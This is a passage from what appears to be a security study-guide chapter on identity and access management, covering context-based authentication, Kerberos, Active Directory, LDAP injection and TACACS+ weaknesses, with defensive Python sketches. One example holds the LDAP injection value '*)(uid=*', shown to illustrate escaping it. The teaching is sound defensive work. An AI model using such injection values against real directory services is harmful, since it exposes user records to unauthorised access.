CHAPTER 12

Identity and Access Management

In this chapter you will learn:

•  Various parameters for context-based authentication

•  Security issues and best practices for using common authentication protocols

•  Security issues with various components of the network environment

•  Commonly used exploits against authentication and access systems

The value of identity of course is that so often with it comes purpose.

—Richard Grant

A 2016 study from Shape Security, a Silicon Valley cybersecurity company, asserted that nearly 90 percent of the password attacks on public-facing company portals were done using automated tools to reuse login and password credentials collected from other breaches. This works because we tend to pick passwords that are easy to break, and then reuse the same weak passwords across many sites. Although the reported 2 percent success rate may not seem noteworthy, it becomes a serious concern when we consider events such as the massive 1.5 billion user breach that Yahoo recently suffered. The difficulty with dealing with attacks at this scale is that these systems were never meant to provide visibility into such volume, nor is the infrastructure in place to handle the increased demand.

An elegant and comparatively low-cost solution to this authentication challenge is to enable and enforce multifactor authentication. This technique of identity assurance requires two or more pieces of information when a user attempts to access a system. Factors fall into three categories: something you know, something you have, and something you are (or something you do). The most effective multifactor systems use factors from at least two of these categories. For example, one factor might be the traditional login and password combination, while another might be a passcode delivered via SMS to a mobile device, or perhaps a biometric feature.

Despite using multiple factors for authentication, it's still a challenge to verify the identity of the person behind the screen. A complementary solution to using multiple factors is the concept of context-based authentication, which aims to make the authentication process more secure by seamlessly and transparently incorporating factors such as location data, time, or even typing patterns. The user is often unaware of these additional factors being validated and processed.


EXAM TIP    Passwords and PINs are examples of something you know. Smart cards, hardware authentication devices, and USB dongles fall into the category of something you have. Something you are and something you do include a biometric characteristic or any other trait inherent to the user such as handwriting or speech pattern.

Security Issues Associated with Context-Based Authentication

Context-based authentication aims to provide increased security and usability by ensuring one or several parameters fall within approved limits, or match historical user data when used in combination with standard login procedures. These parameters include time, IP address, location, device, and biometrics. The goal is to give context to each login event, but doing so requires an upfront investment in infrastructure to generate the identity data required to make the system function. For each parameter that’s part of the process, at least two activities need to happen. The first is the initial cataloging of user data. This might be as straightforward as collecting device information, but data such as biometric measurements are likely to add additional requirements. Depending on where your organization operates, you may have to comply with strict laws regarding the storage and transmission of biometric data, which includes fingerprints, voice recordings, iris scans, and even typing patterns.

The second activity is the comparison and validation process. As with any other type of pattern matching, the challenge here will be to reduce false positives and negatives. It's not useful to have a robust multifactor system if it prevents legitimate users from getting access to the resources they need in a timely fashion. This process also needs to be speedy enough so that it doesn't add noticeable wait time for the user. The last thing you want is users circumventing the process because it's slower than what they're used to. Although this approach certainly incurs higher setup costs, the benefits are increased security, flexibility, and usability over traditional methods. When attempting to take advantage of these systems, attackers will often target the individual parameters or flaws within the implementation of the verification of the multiple factors. A very common approach is to provide false information using a method called spoofing, which is simply any action where an unauthorized user presents seemingly legitimate but fabricated data to a system to gain access. We'll take a deeper look at the various ways attackers try to game systems and the strengths and weaknesses of various context-based authentication techniques in the following sections.

Time

The time parameter in context-based authentication is used to determine the authenticity of a user based on when the activity occurs. It's a bit of a common-sense test: does it make sense for a user to attempt login when there is no need for it, or when it is outside of business hours? This of course requires that the limits of access be defined, and that location is taken into consideration because of time zone differences. If the time limits are known, an attacker might manipulate input to the system, for example by pretending to be in a different time zone, to gain access. Time and location should therefore be closely tied together in preventing unauthorized access. For example, if a user has logged into the system successfully at 10 A.M. GMT from a New York location and attempts to do so again at 11:30 A.M. GMT from a San Francisco location, then you can conclude that this is a suspicious attempt.
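To make the time-plus-location test concrete, here is a minimal sketch of an "impossible travel" check. The coordinates, timestamps, and the 900 km/h speed ceiling (roughly commercial air travel) are illustrative assumptions, not values from any particular product:

```python
import math

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points, in kilometers."""
    r = 6371.0  # mean Earth radius in km
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp = math.radians(lat2 - lat1)
    dl = math.radians(lon2 - lon1)
    a = math.sin(dp / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))

def is_suspicious(prev, curr, max_speed_kmh=900.0):
    """Flag a login whose implied travel speed exceeds max_speed_kmh.

    prev and curr are (lat, lon, epoch_seconds) tuples describing the
    previous and current login events.
    """
    dist = haversine_km(prev[0], prev[1], curr[0], curr[1])
    hours = (curr[2] - prev[2]) / 3600.0
    if hours <= 0:
        return True  # simultaneous logins from two places are suspicious
    return dist / hours > max_speed_kmh

# New York at 10:00 GMT, then San Francisco at 11:30 GMT the same day
ny = (40.71, -74.01, 10 * 3600)
sf = (37.77, -122.42, int(11.5 * 3600))
print(is_suspicious(ny, sf))  # True: the implied speed far exceeds 900 km/h
```

A real system would also account for VPN egress points and known travel patterns before blocking anyone outright.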

Timing can also be brought into the authentication process with the concept of a time window. Some two-factor systems, such as the RSA SecurID mechanism, provide a code to the user during a login attempt, often using a hardware device called a fob, which uses a built-in clock along with a hard-coded secret key to provide continuously changing values. In the case of SecurID, a new code is generated and displayed every 60 seconds. With this device, a user will always have less than a minute to provide the code before it becomes invalid.
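The rotating-code idea can be sketched with an HMAC-based one-time password in the style of RFC 4226/6238. This is not RSA's proprietary SecurID algorithm; the 60-second step simply mirrors the rotation interval described above, and the secret is illustrative:

```python
import hashlib
import hmac
import struct

def totp(secret: bytes, timestamp: int, step: int = 60, digits: int = 6) -> str:
    """Derive a time-based one-time code (RFC 4226/6238 style).

    Any timestamp within the same `step`-second window yields the same
    code, which is what gives the user their sub-minute entry window.
    """
    counter = timestamp // step               # which time window we are in
    msg = struct.pack(">Q", counter)          # 8-byte big-endian counter
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

secret = b"shared-secret"  # illustrative; real tokens use a provisioned key
print(totp(secret, 0) == totp(secret, 59))  # True: same 60-second window
```

Standard TOTP deployments usually use a 30-second step; the server typically also accepts the adjacent window to tolerate small clock drift.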

Location

Wireless location services began as a public safety mandate issued by the Federal Communications Commission (FCC) in 1996. The agency hoped to provide improved response to emergencies by using the data from cellular service providers to get very accurate location information during 911 calls. It was the commercial potential for location services, however, that motivated many companies and manufacturers to improve the accuracy and speed of location information on mobile devices. Nowadays, nearly every mobile device is delivered with at least one application that relies on location services. Using location as a parameter for context-based authentication is a common way to prevent many illegitimate login attempts by only accepting requests from known and trusted localities. There are several methods of reporting location from devices, most of which fall into two categories: network-based location and device-based location. Network-based location info is derived from data about the network that the device resides on. By looking up the IP address, for example, you can determine the country, city, and postal code by querying the Internet registry responsible for that block of IP addresses. However, this method has some significant weaknesses because it's easy to falsify IP addresses. Furthermore, if the attacker has somehow already compromised a device on a trusted network and is using that as a jumping-off point for a larger campaign, then attempting to filter by location in this manner doesn't help much.
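A network-based location check can be sketched as follows. The lookup table here is a hypothetical stand-in for a real GeoIP database or registry query, and the trusted-country policy is an assumption for illustration:

```python
import ipaddress

# Hypothetical mapping standing in for a real GeoIP database; production
# systems would query an Internet registry or a GeoIP provider instead.
GEO_DB = {
    ipaddress.ip_network("203.0.113.0/24"): "US",
    ipaddress.ip_network("198.51.100.0/24"): "DE",
}

TRUSTED_COUNTRIES = {"US"}  # assumed policy for this sketch

def country_for(ip: str):
    """Return the country for an IP, or None if it is unknown."""
    addr = ipaddress.ip_address(ip)
    for net, country in GEO_DB.items():
        if addr in net:
            return country
    return None

def allow_login(ip: str) -> bool:
    """Accept only requests that resolve to a known, trusted locality."""
    return country_for(ip) in TRUSTED_COUNTRIES

print(allow_login("203.0.113.7"))   # True
print(allow_login("198.51.100.9"))  # False
```

Per the caveat above, source addresses can be spoofed or proxied, so a check like this should only ever be one input among several.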

Modern smartphones and laptops use a combination of sensors for location functions. Global Positioning System (GPS) sensors are still the most widely used method for device location reporting. These systems rely on a constellation of satellites to pinpoint the device location anywhere on earth. With three satellites in view, a device can get positioning information down to the meter, and with four it's possible to also get elevation details. Because it's not always possible to get a direct line of sight to GPS satellites at all times, especially in urban areas or indoors, these phones often use a feature called assisted GPS (A-GPS) to improve the accuracy of positioning information. Like standard GPS, A-GPS calculates its location data based on its distance from at least three objects of known position, but instead of using the positions of orbiting satellites it relies on those of fixed cellular towers. By combining these two sources, handsets can provide reliable positioning information even in environments where it's normally difficult to get good connectivity.
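The "distance from at least three objects of known position" idea can be shown with a simplified two-dimensional trilateration sketch. Real GPS receivers solve the three-dimensional version and also solve for receiver clock error (hence the fourth satellite); the anchor positions and distances below are made up for illustration:

```python
def trilaterate(p1, p2, p3):
    """Locate a point from distances to three known anchors (2-D sketch).

    Each argument is (x, y, r): anchor coordinates and measured distance.
    Subtracting the circle equations pairwise eliminates the squared
    unknowns and leaves two linear equations a*x + b*y = c.
    """
    (x1, y1, r1), (x2, y2, r2), (x3, y3, r3) = p1, p2, p3
    a1, b1 = 2 * (x2 - x1), 2 * (y2 - y1)
    c1 = r1**2 - r2**2 - x1**2 + x2**2 - y1**2 + y2**2
    a2, b2 = 2 * (x3 - x1), 2 * (y3 - y1)
    c2 = r1**2 - r3**2 - x1**2 + x3**2 - y1**2 + y3**2
    det = a1 * b2 - a2 * b1          # solve the 2x2 system (Cramer's rule)
    x = (c1 * b2 - c2 * b1) / det
    y = (a1 * c2 - a2 * c1) / det
    return x, y

# Anchors at (0,0), (4,0), (0,3); distances measured from the point (1,1)
pos = trilaterate((0, 0, 2**0.5), (4, 0, 10**0.5), (0, 3, 5**0.5))
print(pos)  # approximately (1.0, 1.0)
```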

An attacker has a few options when it comes to faking positional data. In defending against this, it’s important to understand how location is reported from these devices. The location data is provided to the phones by sensors and is then stored on the device and presented to the authentication server as required. An attacker can either falsify GPS signal data or manipulate the location data on the device itself. The latter requires far less technical expertise and cost. In fact, apps are available for both iOS and Android that will allow a user to easily falsify mobile phone location data. These apps often work only with jailbroken or rooted devices, so one way to ensure legitimate location data is to prevent such modified devices from joining the network.

Frequency

Frequency and speed of login attempts can also provide an important parameter for context-based authentication. Even the most talented programmer has her limits when typing. At peak performance, humans cannot input, interpret, and iterate anywhere near the speed that a machine can. So it's obvious when machines are performing actions that humans should be doing, particularly during activities such as logging onto a system. This is the idea behind frequency-based authentication parameters. If a system observes SSH login attempts at a rate that doesn't seem possible, it can then blacklist or throttle that address to prevent further probing. Attackers know that it's trivial for administrators to implement rate limiting using iptables or similar tools, so they may adjust their attempts to seem more "human like." Still, many hacking tools (for example, password crackers) put a premium on speed, which gives alert analysts an opportunity to detect many attacks.
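Rate limiting of this kind is often implemented with a sliding window over recent attempts. The following is a minimal sketch; the thresholds (5 attempts per 10 seconds) are illustrative and would be tuned to your environment:

```python
import time
from collections import defaultdict, deque

class LoginRateLimiter:
    """Throttle sources whose attempt rate looks machine-driven."""

    def __init__(self, max_attempts=5, window_seconds=10.0):
        self.max_attempts = max_attempts
        self.window = window_seconds
        self.attempts = defaultdict(deque)  # source IP -> attempt timestamps

    def allow(self, source_ip, now=None):
        now = time.monotonic() if now is None else now
        q = self.attempts[source_ip]
        # Drop attempts that have aged out of the sliding window.
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) >= self.max_attempts:
            return False  # candidate for blocking or throttling
        q.append(now)
        return True

limiter = LoginRateLimiter()
results = [limiter.allow("198.51.100.7", now=t)
           for t in (0, 0.1, 0.2, 0.3, 0.4, 0.5)]
print(results)  # [True, True, True, True, True, False]
```

A burst of six attempts in half a second trips the limiter; a patient human never would, which is exactly why attackers slow their tools down.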

Behavioral

Behavioral factors are those based on user interaction with the computer, such as typing rate and mouse movement. A major weakness in traditional password-based authentication systems is that once the session is validated, there are rarely additional attempts to verify that the same user is still in control. Should an attacker hijack a session, he can ride the credentials of the original user to gain unauthorized access. There are several barriers to implementing a continuous authentication solution. For example, it's likely to annoy legitimate users to have to manually authenticate regularly. The key, therefore, is to make the process unseen to the user.

The Defense Advanced Research Projects Agency calls this process “Active Authentication,” where a learning system generates a “cognitive fingerprint” based on user behavior with their machines. Developing this user profile takes a bit of time, but it’s an effective way to keep attackers out of your systems. As artificial intelligence algorithms become more powerful, however, developing automated ways to simulate human behavior, particularly in terms of object recognition, becomes realistic for a moderately resourced but motivated attacker. Several examples of this evolving cat-and-mouse game have been recently demonstrated by the security research community. In one example, researchers demonstrate automated methods of defeating CAPTCHA tests—the web challenges that aim to differentiate humans from machines by presenting tasks in which a person would have a distinct advantage in solving, such as image or sound recognition. Advances in replicating human behavior will have implications on any behavior-based authentication parameter.
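A crude flavor of a "cognitive fingerprint" can be sketched by comparing a session's typing cadence against an enrolled profile. Real systems model far richer features (digraph latencies, key hold times, mouse dynamics); the samples and the three-sigma threshold here are illustrative assumptions:

```python
import statistics

def build_profile(interval_samples):
    """Summarize a user's enrolled inter-keystroke intervals (seconds)."""
    return {
        "mean": statistics.mean(interval_samples),
        "stdev": statistics.stdev(interval_samples),
    }

def matches_profile(profile, observed_intervals, z_threshold=3.0):
    """Flag a session whose mean typing interval sits too many standard
    deviations from the enrolled mean."""
    observed_mean = statistics.mean(observed_intervals)
    z = abs(observed_mean - profile["mean"]) / profile["stdev"]
    return z <= z_threshold

enrolled = [0.18, 0.22, 0.20, 0.25, 0.19, 0.21, 0.23, 0.20]
profile = build_profile(enrolled)
print(matches_profile(profile, [0.21, 0.19, 0.22]))  # True: plausibly the same user
print(matches_profile(profile, [0.02, 0.03, 0.02]))  # False: scripted-speed typing
```

The check runs silently in the background, which is what keeps continuous authentication from annoying legitimate users.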

Security Issues Associated with Identities

A digital identity is a distinct representation of a real-world subject within an information system. Most of us have multiple identities, such as the ones we use at work, in social media, and in personal e-mail. Each requires authentication, which is the process (partially described earlier) by which a subject verifies its ownership of a particular identity for the purpose of obtaining authorization to access specific objects or resources. Therein lies the problem: authenticating identities and providing appropriate authorizations require complex mechanisms that can be exploited by savvy adversaries. This challenge is compounded by workforce trends.

As more companies become increasingly decentralized and mobile, the task of identity management (IDM) emerges as a critical part of the overall IT enterprise. Cloud-enabled productivity apps give users the ability to tie in from any location and from any device, but at a cost. The requirements to maintain security and productivity without increasing cost, downtime, and burden to the user make this a challenging effort. Despite advancements in technology, there are still issues that remain in nearly every part of the trust chain, from user to application.

Personnel

People are the core of a business, but they also present the greatest threat to its security posture. Because a computer cannot positively verify a person’s identity and intention, an IDM solution must collect the right information quickly enough to make an accurate decision. Modern solutions use a combination of the previously discussed parameters to deliver quick access to employees and guests, while remaining agile enough to deny access to unauthorized users. Despite the best technological controls, human error still accounts for the preponderance of incidents. People share passwords, lose devices, and fall victim to phishing e-mails regularly. If an attacker can collect all the information that makes a user unique on a network, then it’s trivial for him to pass himself off as that user. User training is the primary method to address the security issues associated with your organization’s members. Referred to as “securing the human” by the SANS Institute, the practice of educating users on the threats and training them to act appropriately in the network environment helps the organization manage risk. Training users on best practices for protecting their credentials and looking for the signs of compromise will improve your organization’s security posture faster than many technological solutions.

Endpoints

Networks exist to reliably exchange information from node to node. Endpoints must be able to quickly prove that they are who they claim to be. Endpoint authentication, also known as device authentication, usually relies on values derived from device hardware or operating system configuration. A common mechanism for endpoint authentication is a key or token generated by the endpoint and presented to the network or requested resource. Endpoints are particularly vulnerable to abuse regarding authentication because it's easy to spoof or replay endpoint data.
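One common defense against replayed endpoint data is to bind the device's token to a server-issued nonce. The following sketch uses an HMAC over the device ID and nonce; the device IDs and keys are hypothetical:

```python
import hashlib
import hmac

# Per-device key provisioned at enrollment; a hypothetical stand-in for
# values derived from hardware identity or OS configuration.
DEVICE_KEYS = {"laptop-042": b"provisioned-device-key"}

def endpoint_token(device_id: str, nonce: bytes, key: bytes) -> str:
    """Token the endpoint presents: HMAC over its ID and a server nonce.

    The fresh nonce is what makes a captured token useless for replay.
    """
    return hmac.new(key, device_id.encode() + nonce, hashlib.sha256).hexdigest()

def verify_endpoint(device_id: str, nonce: bytes, token: str) -> bool:
    key = DEVICE_KEYS.get(device_id)
    if key is None:
        return False
    expected = endpoint_token(device_id, nonce, key)
    return hmac.compare_digest(expected, token)

nonce = b"server-issued-nonce-001"
token = endpoint_token("laptop-042", nonce, DEVICE_KEYS["laptop-042"])
print(verify_endpoint("laptop-042", nonce, token))         # True
print(verify_endpoint("laptop-042", b"old-nonce", token))  # False: replay fails
```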


NOTE    The Media Access Control (MAC) address is a unique value used to identify network-connected devices at the data-link layer of the OSI network model. This value is assigned to a Network Interface Card (NIC) during the manufacturing process, but forging a device’s MAC address is trivial. The ability to change this value is now a built-in part of many operating systems.

Servers

A widely used technique to authenticate servers is through the use of public key certificates defined by the X.509 standard. These digital certificates are issued to the server’s owning organization by a trusted Certificate Authority (CA), which is required to take steps to verify the identity of the requesting organization. These steps often include paying a significant fee as well as providing corporate documents. The process makes it difficult for a threat actor to be issued a certificate for someone else’s organization. Still, it is possible to steal someone else’s certificate, as was allegedly done during the Stuxnet operation. This approach, as it is commonly implemented, only verifies the identity of one end of the connection—typically the server. Even then, it is possible for attackers to insert themselves in the chain and present fake certificates. Though this generates warnings on the clients’ browsers, these messages are oftentimes dismissed by the users.
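From the client side, enforcing X.509 server verification is largely a matter of not turning it off. In Python's standard library, for instance, a default SSL context already requires a certificate that chains to a trusted CA and matches the requested hostname:

```python
import ssl

# A default client context enforces the checks described above:
# chain validation against trusted CAs and hostname matching.
ctx = ssl.create_default_context()
print(ctx.verify_mode == ssl.CERT_REQUIRED)  # True
print(ctx.check_hostname)                    # True

# A connection made through this context (for example, via
# http.client.HTTPSConnection(..., context=ctx)) raises
# ssl.SSLCertVerificationError when the server presents a certificate
# that does not verify, rather than showing a warning a user can dismiss.
```

Failing closed in code, instead of surfacing a dismissible browser warning, removes the user from the loop that attackers exploit.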

It is better to mutually authenticate servers and clients, and for this we have the Kerberos authentication protocol. Kerberos is found in nearly all operating systems in one form or another. Like the mythological creature, Kerberos has three key components involved in challenging a request for access: the Authentication Service (AS), the Ticket Granting Server (TGS), and the Key Distribution Center (KDC). Figure 12-1 shows the relationship between the client and components of the Kerberos exchange. When the client sends a request to authenticate, the AS will check the KDC database of existing users to verify the user's existence. If a user is successfully located, the AS will return two messages to the client—one that contains a TGS session key and another that has a Ticket Granting Ticket (TGT). The TGT message has information about the client, a timestamp, and a copy of the TGS session key. It is then encrypted with a symmetric key, which the client does not have. The other message has some user information and another copy of the TGS session key. This message is encrypted with the user's secret key, so if the user is not in possession of this key, the client will be unable to read the TGS session key. If the client successfully decrypts the message to get the TGS session key, it can then use that key, along with the TGT, to query the TGS.


Figure 12-1   Relationship between the three “heads” of the Kerberos protocol

At this point, the message that the client sends to the TGS has two parts. The first part is the TGT, which remains encrypted with the secret key. The second part is an authenticator, which has the client ID and is encrypted with the TGS session key (which the TGS does not currently know). The TGS is in possession of the secret key, so it will decrypt the TGT message without a problem. It will use the copy of the TGS session key that it finds in that message to decrypt the authenticator. Now that the TGS can read both messages, it will perform a few steps, such as verify that the tickets haven’t expired and that the authenticator doesn’t already exist. The TGS now prepares two messages similar to how the client originally did. One message will have a service session key that is encrypted with the TGS session key, and the other will have a service ticket that contains a copy of the service session key and is encrypted with a service secret key. The client will be able to decrypt the first message using the stored TGS session key, but will not be able to decrypt the second.

The client will again prepare two messages for the service. The first will be the service ticket, which is still encrypted by the service secret key, and the second message will be an authenticator, which has client data and is encrypted by the service session key. The requested service will then use its service secret key to decrypt the service ticket, revealing the service session key, which it will use to decrypt the authenticator. Finally, if all the user and timestamps check out, the service will return its own authenticator to the client containing a service ID encrypted with the service session key. Because the client machine already has this key, it will decrypt that authenticator message and verify the service ID. From now on, until the ticket expires, the client can use the cached service ticket to continue accessing services.
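The AS exchange described above can be illustrated with a toy simulation. To stay self-contained, this sketch uses a throwaway XOR keystream in place of the real symmetric ciphers Kerberos uses (such as AES), and JSON in place of the real message formats; all key values are made up. Do not mistake it for the actual protocol:

```python
import hashlib
import json

def toy_encrypt(key: bytes, plaintext: bytes) -> bytes:
    """XOR with a SHA-256-derived keystream. A toy stand-in for a real
    cipher, used only to show who can read which message."""
    stream = b""
    counter = 0
    while len(stream) < len(plaintext):
        stream += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(p ^ s for p, s in zip(plaintext, stream))

toy_decrypt = toy_encrypt  # XOR is its own inverse

user_secret_key = b"derived-from-user-password"   # known to user and KDC
tgs_secret_key = b"known-only-to-AS-and-TGS"      # the client never has this
tgs_session_key = b"fresh-session-key"

# Message 1: readable only by a client holding the user's secret key.
msg_for_client = toy_encrypt(user_secret_key, json.dumps(
    {"tgs_session_key": tgs_session_key.decode(), "user": "alice"}).encode())

# Message 2: the TGT, opaque to the client, readable by the TGS.
tgt = toy_encrypt(tgs_secret_key, json.dumps(
    {"client": "alice", "timestamp": 1700000000,
     "tgs_session_key": tgs_session_key.decode()}).encode())

recovered = json.loads(toy_decrypt(user_secret_key, msg_for_client))
print(recovered["tgs_session_key"])  # fresh-session-key
```

The point of the two messages is visible in the code: the client recovers the session key only because it holds the user's secret key, while the TGT remains an opaque blob it simply forwards to the TGS.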

Kerberos has been in use for decades, and you need to understand some key points about its usage. The KDC database is critical to the integrity of the entire Kerberos system. Failing to properly protect this resource from unauthorized access will expose your organization to significant risk. Furthermore, Kerberos is a solution that must be supported by every node in the network to be effective. Kerberos is only useful on a network where all servers, services, and clients are "Kerberos aware" and support encrypted exchanges. Timing plays a major role throughout the Kerberos authentication process. In all exchanges, timestamps are part of the verification process. Having multiple devices as part of the entire process means that all clocks need to be synchronized. If clocks are too far out of synchronization, Kerberos will not authenticate properly. In the Microsoft implementation of Kerberos, this value can be set in policy in a setting called "Maximum tolerance for computer clock synchronization." Best practice dictates that this value doesn't exceed five minutes.
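The timestamp tolerance check amounts to a simple comparison, sketched below with the five-minute default described above:

```python
from datetime import datetime, timedelta, timezone

MAX_SKEW = timedelta(minutes=5)  # mirrors the default policy value above

def timestamp_acceptable(message_time: datetime, now: datetime) -> bool:
    """Reject authenticators whose timestamps drift beyond tolerance."""
    return abs(now - message_time) <= MAX_SKEW

now = datetime(2017, 3, 1, 12, 0, tzinfo=timezone.utc)
print(timestamp_acceptable(now - timedelta(minutes=3), now))  # True
print(timestamp_acceptable(now - timedelta(minutes=7), now))  # False
```

In practice this is why an otherwise healthy domain can suddenly fail authentication when a domain controller or client drifts off the time source.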


EXAM TIP    Although you will not be expected to step through a full Kerberos authentication process, you should understand its architecture and use of tickets and symmetric keys.

Services

Masquerading as services is an effective way to phish users into providing sensitive data. At the user level, it’s extremely difficult to detect a fake service. However, there are solutions to ensure the authenticity of a service, depending on the network environment. To prevent abuses by rogue services, Microsoft’s .NET Framework has a feature called Service Identity and Authentication. The Windows Communication Foundation (WCF) infrastructure will ensure that the identity value of the requested service matches a preset value. Figure 12-2 shows the syntax of the identity element in the WCF. When a client attempts to connect to a service using this feature, it will first perform whatever standard authentication procedure is in place. Once the service successfully authenticates to the client machine, it will then compare a stored value called the endpoint identity to the value that the service provides during that interaction. If these match, the client machine can then access the service. Elements of the identity value include certificate information, DNS, RSA value, service names, and user name. This is essentially a second authentication process that happens under the hood.
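As a sketch of what this looks like in a client's configuration file (the endpoint address, contract name, and DNS value below are hypothetical, not from any real deployment), a client pinning a service's DNS identity might resemble:

```xml
<client>
  <endpoint address="http://localhost:8000/SecureService"
            binding="wsHttpBinding"
            contract="ISecureService">
    <identity>
      <!-- The client proceeds only if the service proves this DNS identity -->
      <dns value="contoso.com" />
    </identity>
  </endpoint>
</client>
```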


Figure 12-2   Syntax of the identity element used by the Windows Communication Foundation

Roles

You may recall our discussion about role-based access control in Chapter 3. A blog user, for example, might have the username “tony” and be assigned the role of “editor.” Another user called “karen” might have the role of “admin.” Each user may have multiple simultaneous roles (for example, contributor, editor, and approver), and each role will allow access to certain resources. These access control levels are based on the necessary operations and tasks users need to carry out to fulfill responsibilities within an organization. This approach can be complex because an administrator must translate an organizational authorization policy into permissions when configuring access controls. As the number of objects and users grows within an environment, users are bound to be granted unnecessary access to some objects, thus violating the least-privilege rule and increasing the risk to the company.
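The blog example above can be sketched as a role-to-permission mapping with a single authorization check. The permission names and role contents here are illustrative, not a standard:

```python
# Illustrative role-to-permission mapping for the blog example above.
ROLE_PERMISSIONS = {
    "contributor": {"post.create"},
    "editor": {"post.create", "post.edit"},
    "approver": {"post.approve"},
    "admin": {"post.create", "post.edit", "post.approve", "user.manage"},
}

USER_ROLES = {
    "tony": {"editor"},
    "karen": {"admin"},
}

def is_authorized(user: str, permission: str) -> bool:
    """Union the permissions of all of a user's roles, then check."""
    granted = set()
    for role in USER_ROLES.get(user, set()):
        granted |= ROLE_PERMISSIONS.get(role, set())
    return permission in granted

print(is_authorized("tony", "post.edit"))    # True
print(is_authorized("tony", "user.manage"))  # False: least privilege holds
```

Auditing roles then reduces to walking this mapping and asking, for each user, whether every granted permission is still needed.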

Attackers will often attempt to determine which users have elevated permissions based on their roles. Sometimes, users with elevated roles may not be aware of these elevated privileges, which creates a security problem. Auditing roles should be a part of your assessment to ensure that users are only getting the roles necessary for their tasks.


NOTE    In the majority of cases, roles are associated with identities and not authenticated directly. You can think of it as an extension of an identity, describing what kinds of activities can be performed. The relationship may be one-to-many, meaning that a single identity can have multiple roles and invoke the required privileges based on the task.

Applications

Applications are constantly the target of malicious actors looking for ways into a system. Web applications designed to be accessed by the public will restrict what a public user is able to query or execute. Attackers will often try to manipulate the input to these applications to achieve privilege escalation, or elevated access to the target application or operating system. A successful attack is usually the result of a software flaw or misconfiguration. We can use the principles covered in our previous discussion on vulnerability assessment in Chapters 5 and 6 to identify and deal with these vulnerabilities.

Security Issues Associated with Identity Repositories

An identity repository is any resource that stores the credentials necessary to validate a user’s network access. Attackers will often target identity stores to add or change user attributes. Routinely monitoring these repositories for signs of manipulation will alert you to an attacker’s presence.

Directory Services

A directory service server is essentially a central repository for storing and managing information. Administrators rely on directory services to provide management and security options at scale. For the users, directory services allow them to quickly locate network resources without having to remember addresses. Nearly any information about the network can be stored in a directory service data store. Both users and the resources they seek are assigned unique identifiers, and users can often be authenticated and authorized to enterprise services and applications based on this information. Directory services need to be scalable and able to integrate well with various other services on the network.

Active Directory

Active Directory (AD) plays a critical role in many organizations. As the directory service for Windows environments, AD allows organizations to centrally manage resources while providing network security policy. Any user, system, resource, or service in an AD environment is considered an object, which has attributes associated with it, including name and description. The goal of many attackers who target AD environments is to gain a foothold in a network, pivot across systems, and eventually gain access to the AD domain controllers. This type of access would give an attacker complete control over all the objects associated with the organization.

Two primary approaches to protecting these environments are to reduce the attack surface of the AD and to enable auditing functionality. By default, AD has several privileged account groups such as Enterprise Admins (EA), Domain Admins (DA), and Built-in Admins (BA). Using the principle of least privilege (POLP), you should only have the necessary number of administrators active on the network with just the right amount of privilege for day-to-day administration. The second technique for improving AD security is to develop a system for event log monitoring and to enable detailed object auditing. Many incidents can be discovered very early if the right levels of auditing and reporting are enabled. Using advanced features such as Object Access Auditing as part of your directory-wide security policy, you can determine when a sensitive object is accessed or changed, and report those changes as necessary. By default, this value is not enabled, but when combined with a well-designed SIEM solution, it will provide you with speed and flexibility in identifying unusual network behavior before any damage occurs.


EXAM TIP    Under no circumstances should administrative rights to an AD service be shared. Malicious individuals who obtain administrative access to AD domain controllers have total control over the network. Even non-malicious but inexperienced users with access can cause unanticipated problems should they make incorrect configuration changes.

LDAP

Underpinning most directory services in use today is the Lightweight Directory Access Protocol (LDAP). LDAP provides a cross-platform open standard for maintaining directory services on a network. Users can query the LDAP server to get responses based on specifically formatted statements. It's possible for an attacker to craft statements that trigger the LDAP server to provide additional information not normally authorized for the requester—or worse, to get the server to execute arbitrary code. Suppose that a system allows the requester to search for only a particular kind of resource—in this case, printers and storage devices. Figure 12-3 shows an example of a normal user and her request and response compared to that provided by an attacker. In the legitimate request, the user specifies a search for either storage devices or printers. Note that the attacker formats his query in such a way that when interpreted, the input values appear to be LDAP commands and are executed at a higher level than the user is normally allowed. The system provides the results for all users based on its interpretation of (uid=*).


Figure 12-3   Legitimate LDAP query compared to an LDAP injection query

The key to defending against this type of attack is to validate and sanitize user input to prevent extra commands from being interpreted. You can achieve this by escaping special characters and restricting user input that contains regular expressions.
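The escaping defense can be sketched as follows, using the hex-escape convention from RFC 4515 for LDAP filter metacharacters (the `uid` filter template is illustrative):

```python
def escape_ldap_filter_value(value: str) -> str:
    """Escape special characters in a user-supplied LDAP filter value,
    following the RFC 4515 convention of hex-escaping metacharacters."""
    value = value.replace("\\", "\\5c")  # backslash must be escaped first
    value = value.replace("*", "\\2a")
    value = value.replace("(", "\\28")
    value = value.replace(")", "\\29")
    value = value.replace("\x00", "\\00")
    return value

def build_uid_filter(user_input: str) -> str:
    """Build a uid search filter from untrusted input."""
    return "(uid={})".format(escape_ldap_filter_value(user_input))

print(build_uid_filter("karen"))      # (uid=karen)
# The classic injection payload becomes a harmless literal string:
print(build_uid_filter("*)(uid=*"))   # (uid=\2a\29\28uid=\2a)
```

After escaping, the attacker's `(uid=*)` fragment can no longer terminate the filter early, so the server matches it as literal text instead of interpreting it.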

TACACS+

Terminal Access Controller Access Control System Plus (TACACS+) is an authentication, authorization, and accounting (AAA) protocol that originated with Cisco in the 1990s. As an alternative to Kerberos, TACACS+ uses a client/server approach to determine a user’s access level to anything on the network. At the time of the connection attempt, the user is compared against the user database, and the policy is then applied to that user. With TACACS+, the authentication, authorization, and accounting functions are treated as separate and independent. Though designed to be used primarily for device AAA, the protocol is often used for network AAA functions as well. Despite its strong suitability for network AAA, TACACS+ has some fundamental weaknesses in its protocol. Even though it uses TCP, it is particularly vulnerable to replay attacks because every sequence number always starts with 1. This means that an attacker doesn’t have to guess where the sequence of a legitimate exchange left off because the TACACS+ system will always accept a session beginning with sequence number 1. Additionally, the session IDs are relatively short during TACACS+ exchanges, and the pool of possible IDs is small enough to be vulnerable to so-called “birthday attacks,” or collisions in a cryptographic hash function.


NOTE    Although it shares most of its name with TACACS and XTACACS, the newer TACACS+ is an entirely different protocol that is not compatible with the older authentication methods.

RADIUS

